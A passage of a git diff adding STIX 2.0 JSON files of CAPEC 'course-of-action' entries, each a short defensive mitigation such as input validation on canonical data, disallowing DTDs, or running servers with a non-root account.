"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e019f7bf-bb49-46a3-990b-261c1993c535.json b/capec/course-of-action/course-of-action--e019f7bf-bb49-46a3-990b-261c1993c535.json new file mode 100644 index 0000000000..19eb7f3f59 --- /dev/null +++ b/capec/course-of-action/course-of-action--e019f7bf-bb49-46a3-990b-261c1993c535.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b459a7de-756d-4e16-978a-51fb2549f023", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e019f7bf-bb49-46a3-990b-261c1993c535", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-74-1", + "description": "Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e04fa978-708c-4f71-8057-c7f3a317801e.json b/capec/course-of-action/course-of-action--e04fa978-708c-4f71-8057-c7f3a317801e.json new file mode 100644 index 0000000000..b09f28b0ad --- /dev/null +++ b/capec/course-of-action/course-of-action--e04fa978-708c-4f71-8057-c7f3a317801e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a499bfa0-3fb2-47de-af70-b22bb3c03c75", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e04fa978-708c-4f71-8057-c7f3a317801e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-228-1", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e179c216-27fd-4547-9dce-78b800823e09.json b/capec/course-of-action/course-of-action--e179c216-27fd-4547-9dce-78b800823e09.json new file mode 100644 index 0000000000..83445e1e5d --- /dev/null +++ b/capec/course-of-action/course-of-action--e179c216-27fd-4547-9dce-78b800823e09.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--693a8ed7-83b4-474a-94e2-6a5e33b8b413", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e179c216-27fd-4547-9dce-78b800823e09", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-598-0", + "description": "Design: Avoid dependence on DNS", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e1aa6f73-a3a5-4981-92dd-f324834cd257.json b/capec/course-of-action/course-of-action--e1aa6f73-a3a5-4981-92dd-f324834cd257.json new file mode 100644 index 0000000000..6c28d47bb7 --- /dev/null +++ b/capec/course-of-action/course-of-action--e1aa6f73-a3a5-4981-92dd-f324834cd257.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--69edb116-c93d-4386-8bfe-14312131f5e4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e1aa6f73-a3a5-4981-92dd-f324834cd257", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-248-0", + "description": "All user-controllable input should be validated and filtered for potentially unwanted characters. Whitelisting input is desired, but if a blacklisting approach is necessary, then focusing on command related terms and delimiters is necessary.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63.json b/capec/course-of-action/course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63.json new file mode 100644 index 0000000000..8dc5d9894d --- /dev/null +++ b/capec/course-of-action/course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f4c97d7b-fe4c-41b6-ad0f-27e24f87e050", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-5", + "description": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e2706dc6-3de4-4fe9-bea1-e4dc299d2135.json b/capec/course-of-action/course-of-action--e2706dc6-3de4-4fe9-bea1-e4dc299d2135.json new file mode 100644 index 0000000000..c032b4824c --- /dev/null +++ b/capec/course-of-action/course-of-action--e2706dc6-3de4-4fe9-bea1-e4dc299d2135.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4cd472a3-cbe6-447d-8714-f94e811ea3ed", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e2706dc6-3de4-4fe9-bea1-e4dc299d2135", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-173-0", + "description": "\n Avoid interacting with suspicious sites or clicking suspicious links.\n An organization should provide regular, robust cybersecurity training to its employees.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e2ee1f2a-0265-4601-9703-d4a308c1f7ea.json b/capec/course-of-action/course-of-action--e2ee1f2a-0265-4601-9703-d4a308c1f7ea.json new file mode 100644 index 0000000000..9aecdc22c6 --- /dev/null +++ b/capec/course-of-action/course-of-action--e2ee1f2a-0265-4601-9703-d4a308c1f7ea.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--828e35cf-173d-4a34-966a-dc05621d5b64", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e2ee1f2a-0265-4601-9703-d4a308c1f7ea", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-640-2", + "description": "Leverage security kernel modules providing advanced access control and process restrictions like SELinux.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671.json b/capec/course-of-action/course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671.json new file mode 100644 index 0000000000..2bbe72b7e9 --- /dev/null +++ b/capec/course-of-action/course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c8de1f7c-d4df-4d6b-abc4-e23e57f2d3b5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-230-1", + "description": "Perform validation on canonical data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e37545a6-d0e5-4e14-9145-0795cc3b9dec.json b/capec/course-of-action/course-of-action--e37545a6-d0e5-4e14-9145-0795cc3b9dec.json new file mode 100644 index 0000000000..2f643df4a2 --- /dev/null +++ b/capec/course-of-action/course-of-action--e37545a6-d0e5-4e14-9145-0795cc3b9dec.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b4b06a87-009b-47c9-b534-4b3b6406d92a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e37545a6-d0e5-4e14-9145-0795cc3b9dec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-105-3", + "description": "Use web servers that employ a tight HTTP parsing process", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e3d8ccf0-cc09-4101-b905-b95dfa0922fe.json b/capec/course-of-action/course-of-action--e3d8ccf0-cc09-4101-b905-b95dfa0922fe.json new file mode 100644 index 0000000000..6dd0993d59 --- /dev/null +++ b/capec/course-of-action/course-of-action--e3d8ccf0-cc09-4101-b905-b95dfa0922fe.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--36620e5e-2e5c-466d-bde7-d82aa241765b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e3d8ccf0-cc09-4101-b905-b95dfa0922fe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-256-0", + "description": "If the server either verifies the correctness of the stated array size or if the server stops processing an array once the stated number of elements have been read, regardless of the actual array size, then this attack will fail. The former detects the malformed SOAP message while the latter ensures that the server does not attempt to load more data than was allocated for.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e41036ac-078e-45d9-ad72-811abfa1f31b.json b/capec/course-of-action/course-of-action--e41036ac-078e-45d9-ad72-811abfa1f31b.json new file mode 100644 index 0000000000..2966b5ae5d --- /dev/null +++ b/capec/course-of-action/course-of-action--e41036ac-078e-45d9-ad72-811abfa1f31b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d304ba48-2e18-4c94-9594-2f73c4cc35c3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e41036ac-078e-45d9-ad72-811abfa1f31b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-2-1", + "description": "When implementing security features, consider how they can be misused and made to turn on themselves.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e473da6c-f848-4ec4-bb21-7012b12fb4e9.json b/capec/course-of-action/course-of-action--e473da6c-f848-4ec4-bb21-7012b12fb4e9.json new file mode 100644 index 0000000000..e773538568 --- /dev/null +++ b/capec/course-of-action/course-of-action--e473da6c-f848-4ec4-bb21-7012b12fb4e9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--44be241a-cefd-4af1-b391-03861246433b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e473da6c-f848-4ec4-bb21-7012b12fb4e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-59-2", + "description": "Do not use information available to the user in order to generate session ID (e.g., time).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e4a7dea4-6d70-49b0-8dd2-0e5ca7026726.json b/capec/course-of-action/course-of-action--e4a7dea4-6d70-49b0-8dd2-0e5ca7026726.json new file mode 100644 index 0000000000..7a287f3314 --- /dev/null +++ b/capec/course-of-action/course-of-action--e4a7dea4-6d70-49b0-8dd2-0e5ca7026726.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a4c69136-56db-4cfe-bd41-a62a19f87d05", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e4a7dea4-6d70-49b0-8dd2-0e5ca7026726", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-76-3", + "description": "Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e4adb3b1-70c1-4e55-a3f0-446e8a7e2245.json b/capec/course-of-action/course-of-action--e4adb3b1-70c1-4e55-a3f0-446e8a7e2245.json new file mode 100644 index 0000000000..858069acb2 --- /dev/null +++ b/capec/course-of-action/course-of-action--e4adb3b1-70c1-4e55-a3f0-446e8a7e2245.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5a800d14-5c6d-4692-b115-dd8e15dfe17e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e4adb3b1-70c1-4e55-a3f0-446e8a7e2245", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-51-2", + "description": "Implementation: Implement communications to and from the registry using secure protocols", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7.json b/capec/course-of-action/course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7.json new file mode 100644 index 0000000000..46435c7eec --- /dev/null +++ b/capec/course-of-action/course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--485b8301-235b-4b4b-9490-cf482308f216", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-120-6", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e71a404e-6c1e-4f7b-ad58-6275749c3c7a.json b/capec/course-of-action/course-of-action--e71a404e-6c1e-4f7b-ad58-6275749c3c7a.json new file mode 100644 index 0000000000..3ca8584ae3 --- /dev/null +++ b/capec/course-of-action/course-of-action--e71a404e-6c1e-4f7b-ad58-6275749c3c7a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fc806b25-7144-4f42-bcd2-35747f6bf8b3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e71a404e-6c1e-4f7b-ad58-6275749c3c7a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-54-0", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e771e07e-01bf-4984-b3e0-fab66906ffdb.json b/capec/course-of-action/course-of-action--e771e07e-01bf-4984-b3e0-fab66906ffdb.json new file mode 100644 index 0000000000..67847020ba --- /dev/null +++ b/capec/course-of-action/course-of-action--e771e07e-01bf-4984-b3e0-fab66906ffdb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--13d00326-288d-44f2-abdd-1b35ed143c34", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e771e07e-01bf-4984-b3e0-fab66906ffdb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-222-2", + "description": "Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e8688baf-3694-4ee8-91f4-54424d9675fa.json b/capec/course-of-action/course-of-action--e8688baf-3694-4ee8-91f4-54424d9675fa.json new file mode 100644 index 0000000000..0f39f41566 --- /dev/null +++ b/capec/course-of-action/course-of-action--e8688baf-3694-4ee8-91f4-54424d9675fa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3bcd25cb-a294-44c9-8aea-34a7e1eff0e5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e8688baf-3694-4ee8-91f4-54424d9675fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-31-3", + "description": "Implementation: Ensure the web server implements all relevant security patches, many exploitable buffer overflows are fixed in patches issued for the software.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684.json b/capec/course-of-action/course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684.json new file mode 100644 index 0000000000..db71da86d5 --- /dev/null +++ b/capec/course-of-action/course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6d2ef22d-82ef-4b0a-a3f3-5ee033f3549c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-588-0", + "description": "Use browser technologies that do not allow client-side scripting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e88fd775-8949-41b9-a6c5-cdd3b5ac5118.json b/capec/course-of-action/course-of-action--e88fd775-8949-41b9-a6c5-cdd3b5ac5118.json new file mode 100644 index 0000000000..54181e93ea --- /dev/null +++ b/capec/course-of-action/course-of-action--e88fd775-8949-41b9-a6c5-cdd3b5ac5118.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2794a58e-4f61-4010-9761-06ceca1f26bc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e88fd775-8949-41b9-a6c5-cdd3b5ac5118", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-80-2", + "description": "For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e8ea0f31-fe05-4ac8-90d7-23321f8bbde9.json b/capec/course-of-action/course-of-action--e8ea0f31-fe05-4ac8-90d7-23321f8bbde9.json new file mode 100644 index 0000000000..1786708554 --- /dev/null +++ b/capec/course-of-action/course-of-action--e8ea0f31-fe05-4ac8-90d7-23321f8bbde9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--62d2f44b-21f4-4f63-a59a-557587d6c0c8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e8ea0f31-fe05-4ac8-90d7-23321f8bbde9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-43-1", + "description": "Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43.json b/capec/course-of-action/course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43.json new file mode 100644 index 0000000000..5626a480b8 --- /dev/null +++ b/capec/course-of-action/course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c291bffa-e1ba-444f-a658-e647d5d29ab5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-13-2", + "description": "Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e9490c07-8a26-412c-88a2-b20d64197ae3.json b/capec/course-of-action/course-of-action--e9490c07-8a26-412c-88a2-b20d64197ae3.json new file mode 100644 index 0000000000..353c678579 --- /dev/null +++ b/capec/course-of-action/course-of-action--e9490c07-8a26-412c-88a2-b20d64197ae3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f8f5a700-6ed1-4f8c-b231-47d942d110e0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e9490c07-8a26-412c-88a2-b20d64197ae3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-640-4", + "description": "Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--e9cc1876-cdac-43ec-b5a0-bc4b8278c9a2.json b/capec/course-of-action/course-of-action--e9cc1876-cdac-43ec-b5a0-bc4b8278c9a2.json new file mode 100644 index 0000000000..f4072937e6 --- /dev/null +++ b/capec/course-of-action/course-of-action--e9cc1876-cdac-43ec-b5a0-bc4b8278c9a2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a1c66f36-da63-4517-9dce-b8bd5b002f13", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--e9cc1876-cdac-43ec-b5a0-bc4b8278c9a2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-5-0", + "description": "Implementation: Upgrade phone lines. Note this may be prohibitively expensive", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--eb35cf7c-719a-45a8-abf5-fd1eda76d848.json b/capec/course-of-action/course-of-action--eb35cf7c-719a-45a8-abf5-fd1eda76d848.json new file mode 100644 index 0000000000..2ecfc2e468 --- /dev/null +++ b/capec/course-of-action/course-of-action--eb35cf7c-719a-45a8-abf5-fd1eda76d848.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0c828eb4-ace6-4542-96f8-4554b4ebfa00", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--eb35cf7c-719a-45a8-abf5-fd1eda76d848", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-598-2", + "description": "Implementation: Utilize a .onion domain with Tor support", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--eb3f9c77-2496-47fd-ba75-584b9bcf5b65.json b/capec/course-of-action/course-of-action--eb3f9c77-2496-47fd-ba75-584b9bcf5b65.json new file mode 100644 index 0000000000..54c6930dc1 --- /dev/null +++ b/capec/course-of-action/course-of-action--eb3f9c77-2496-47fd-ba75-584b9bcf5b65.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--925687b4-0b59-4543-b15b-a1ed1a5a8992", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--eb3f9c77-2496-47fd-ba75-584b9bcf5b65", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-26-0", + "description": "Use safe libraries to access resources such as files.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--eb78da5d-7bd7-458a-93ba-a2f7c782a1af.json b/capec/course-of-action/course-of-action--eb78da5d-7bd7-458a-93ba-a2f7c782a1af.json new file mode 100644 index 0000000000..84c94e71e3 --- /dev/null +++ b/capec/course-of-action/course-of-action--eb78da5d-7bd7-458a-93ba-a2f7c782a1af.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b9bf6624-964a-43bd-9d29-0405aa97fadc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--eb78da5d-7bd7-458a-93ba-a2f7c782a1af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-10-2", + "description": "Use a language or compiler that performs automatic bounds checking", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ebb71328-0223-4062-8a80-43070611f373.json b/capec/course-of-action/course-of-action--ebb71328-0223-4062-8a80-43070611f373.json new file mode 100644 index 0000000000..352ebfd80e --- /dev/null +++ b/capec/course-of-action/course-of-action--ebb71328-0223-4062-8a80-43070611f373.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--caab5955-accb-4eec-bdc9-963a0ae986a0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ebb71328-0223-4062-8a80-43070611f373", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-637-1", + "description": "Employ a robust identification and audit/blocking via whitelisting of applications on your system. Malware may contain the functionality associated with this attack pattern.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ebc1b6cd-e87f-4baa-90e5-dd9eb0318070.json b/capec/course-of-action/course-of-action--ebc1b6cd-e87f-4baa-90e5-dd9eb0318070.json new file mode 100644 index 0000000000..edc302afec --- /dev/null +++ b/capec/course-of-action/course-of-action--ebc1b6cd-e87f-4baa-90e5-dd9eb0318070.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0e6da7bd-e79a-4957-b117-959de9d9346d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ebc1b6cd-e87f-4baa-90e5-dd9eb0318070", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-9-0", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use 